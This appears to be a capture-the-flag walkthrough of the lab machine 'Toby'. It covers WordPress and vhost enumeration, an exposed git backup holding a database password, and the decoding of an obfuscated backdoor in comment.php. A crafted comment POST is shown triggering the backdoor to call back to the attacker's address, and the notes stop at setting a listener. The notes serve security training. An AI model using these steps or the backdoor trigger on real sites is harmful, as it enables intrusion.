# Robots file

`http://10.129.141.106/robots.txt`

```
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
```

# Subdomain found

`http://wordpress.toby.htb/wp-login.php?redirect_to=http%3A%2F%2F10.129.141.106%2Fwp-admin%2F&reauth=1`

# Add subdomain

` nano /etc/hosts`

```
┌──(root㉿kali)-[~/htb/Box/Linux/Toby]
└─# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
10.129.141.106  wordpress.toby.htb toby.htb
```

# Enum wordpress

`wpscan --url http://toby.htb/ -e`

```
[+] http://toby.htb/?attachment_id=6
 | Found By: Attachment Brute Forcing (Aggressive Detection)

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] toby
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://toby.htb/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] toby-admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
```

# Enum vhost

`gobuster vhost -u 'http://toby.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 40`

```
┌──(root㉿kali)-[~/htb/Box/Linux/Toby]
└─# gobuster vhost -u 'http://toby.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 40 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://toby.htb
[+] Method:       GET
[+] Threads:      40
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/03/22 14:38:30 Starting gobuster in VHOST enumeration mode
===============================================================
Found: backup.toby.htb (Status: 200) [Size: 7938]
```

# Enum web page

`http://backup.toby.htb/`

`http://backup.toby.htb/toby-admin`

# Fuzzing repositories

`gobuster dir -u 'http://backup.toby.htb/toby-admin/' -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,dat,bak,zip -t 20`

```
┌──(root㉿kali)-[~/htb/Box/Linux/Toby]
└─# gobuster dir -u 'http://backup.toby.htb/toby-admin/' -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,dat,bak,zip -t 20
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://backup.toby.htb/toby-admin/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,dat,bak,zip,php,txt
[+] Timeout:                 10s
===============================================================
2022/03/23 13:46:33 Starting gobuster in directory enumeration mode
===============================================================
/backup               (Status: 200) [Size: 14132]
```

# Backup repositorie

`http://backup.toby.htb/toby-admin/backup`

`git clone http://backup.toby.htb/toby-admin/backup.git`

```
┌──(root㉿kali)-[~/htb/Box/Linux/Toby]
└─# git clone http://backup.toby.htb/toby-admin/backup.git                                                                               
Cloning into 'backup'...
remote: Enumerating objects: 1613, done.
remote: Counting objects: 100% (1613/1613), done.
remote: Compressing objects: 100% (1433/1433), done.
remote: Total 1613 (delta 123), reused 1613 (delta 123)
Receiving objects: 100% (1613/1613), 10.80 MiB | 3.28 MiB/s, done.
Resolving deltas: 100% (123/123), done.
```

# Reading code

`wp-config.php`

```
/** MySQL database password */
define( 'DB_PASSWORD', 'OnlyTheBestSecretsGoInShellScripts' );
```

# Backdoor in code

`wp-includes/comment.php`

# Decode backdoor script

```php
<?php
$test = eval("return gzuncompress(str_rot13(base64_decode('a5wUmlLSs..............7+/T9dCghs')));");

while (True){
$cadena1 = str_replace('eval(','',$test);
$cadena2 = str_replace(');',';',$cadena1);
$cadena3 = eval("return $cadena2;");
echo "\n\n";
$test = $cadena3;
echo $test;
}
?>
```

# After clean backdoor we get code

`php clean.php`

```php
if($comment_author_email=="help@toby.htb"&&$comment_author_url=="http://test.toby.htb/"&&substr($comment_content,0,8)=="746f6279"){
    $a=substr($comment_content,8);
    $host=explode(":",$a)[0];
    $sec=explode(":",$a)[1];
    $d="/usr/bin/wordpress_comment_validate";
    include $d;
    wp_validate_4034a3($host,$sec);
    return new WP_Error('unspecified error');}
```

# Send request 

```
POST /wp-comments-post.php HTTP/1.1
Host: wordpress.toby.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
Origin: http://wordpress.toby.htb
Connection: close
Referer: http://wordpress.toby.htb/2021/07/08/hello-world/
Upgrade-Insecure-Requests: 1

comment=746f627910.10.14.51:1234&author=toby-admin&email=help%40toby.htb&url=http%3A%2F%2Ftest.toby.htb%2F&submit=Post+Comment&comment_post_ID=1&comment_parent=0
```

```
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 25 Mar 2022 17:36:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: close
X-Powered-By: PHP/7.4.21
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0

err2
```

# Capture traffic with wireshark we can see port 20053

```
"58","179.308777992","10.129.142.247","10.10.14.51","TCP","60","51364 → 20053 [SYN] Seq=0 Win=64240 Len=0 MSS=1285 SACK_PERM=1 TSval=2848270293 TSecr=0 WS=128"
"59","179.308814758","10.10.14.51","10.129.142.247","TCP","40","20053 → 51364 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0"
```

# Set listener on 20053

